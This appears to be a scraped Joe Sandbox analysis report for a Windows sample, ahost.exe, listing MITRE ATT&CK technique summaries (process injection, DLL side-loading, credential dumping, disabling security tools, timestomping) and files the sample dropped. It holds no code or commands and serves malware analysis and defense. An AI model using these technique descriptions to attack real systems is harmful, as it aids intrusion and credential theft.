Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ahost.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Data Obfuscation

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\ ?? ? \Display (1).png

C:\Users\user\AppData\Local\Temp\MpCmdRun.log

C:\Users\user\AppData\Local\Temp\RES46FF.tmp

C:\Users\user\AppData\Local\Temp\_MEI72722\VCRUNTIME140.dll

Windows Analysis Report
ahost.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre